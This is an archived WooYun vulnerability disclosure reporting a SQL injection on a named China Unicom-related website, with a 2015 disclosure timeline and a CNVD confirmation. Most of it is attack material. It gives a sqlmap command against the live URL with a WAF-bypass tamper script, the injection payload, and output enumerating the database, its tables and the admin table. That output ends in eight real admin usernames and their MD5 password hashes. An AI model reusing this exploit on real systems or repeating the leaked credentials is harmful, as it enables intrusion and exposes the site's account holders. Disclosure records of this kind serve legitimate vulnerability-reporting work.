乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-30: 细节已通知厂商并且等待厂商处理中 2015-08-03: 厂商已经确认,细节仅向厂商公开 2015-08-13: 细节向核心白帽子及相关领域专家公开 2015-08-23: 细节向普通白帽子公开 2015-09-02: 细节向实习白帽子公开 2015-09-17: 细节向公众公开
sqlmap.py -u "http://www.chinaunicomsi.cn/cnc/cncsi.asp?id=%5c" --tamper=space2mssqlblank.py --current-db
有WAF,加个tamper=space2mssqlblank.py脚本即可绕过
sqlmap identified the following injection points with a total of 65 HTTP(s) requests:---Parameter: id (GET) Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: id=(SELECT CHAR(113)+CHAR(107)+CHAR(118)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (6037=6037) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(113)+CHAR(113))---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: id=(SELECT CHAR(113)+CHAR(107)+CHAR(118)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (6037=6037) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(113)+CHAR(113))---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000current database: 'oyy'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: id=(SELECT CHAR(113)+CHAR(107)+CHAR(118)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (6037=6037) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(113)+CHAR(113))---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000Database: oyy[16 tables]+-----------------+| Admin || BigClass_down || Download || Feedback || News || SmallClass || SmallClass_down || WebBasicInfo || bigClass || book_setup || dtproperties || gonggao || shop_pinglun || sogo_link || sysconstraints || syssegments |+-----------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: id=(SELECT CHAR(113)+CHAR(107)+CHAR(118)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (6037=6037) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(113)+CHAR(113))---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000Database: oyyTable: admin[12 columns]+---------------------+----------+| Column | Type |+---------------------+----------+| Addtime | datetime || admin | nvarchar || aleave | nvarchar || ArticleNum | int || bigclassauthorize | nvarchar || ID | int || LastLogintime | datetime || LoginIP | nvarchar || LoginNum | int || password | nvarchar || smallclassauthorize | nvarchar || userkey | int |+---------------------+----------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: id=(SELECT CHAR(113)+CHAR(107)+CHAR(118)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (6037=6037) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(113)+CHAR(113))---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000Database: oyyTable: admin[8 entries]+---------+----------------------------------+| admin | password |+---------+----------------------------------+| admin | 0cc175b9c0f1b6a831c399e269772661 || liubin | 790a26695c7c9f38fa32d95bfa6b8e4a || liujia | b9181c2c34c3a4200643799ded066a29 || oyaya | 0cc175b9c0f1b6a831c399e269772661 || test | 0cc175b9c0f1b6a831c399e269772661 || twhd | 0e263a2a84460a460cc77ee5be06d0ac || wangll | 927941f81c139547f7b5ff053498638c || zhangll | 3077bb4f20cf94e87aa0796eeb078fe3 |+---------+----------------------------------+
危害等级:中
漏洞Rank:9
确认时间:2015-08-03 10:45
CNVD确认并复现所述情况,已经转由CNCERT下发给黑龙江分中心,由其后续协调网站管理单位处置。
暂无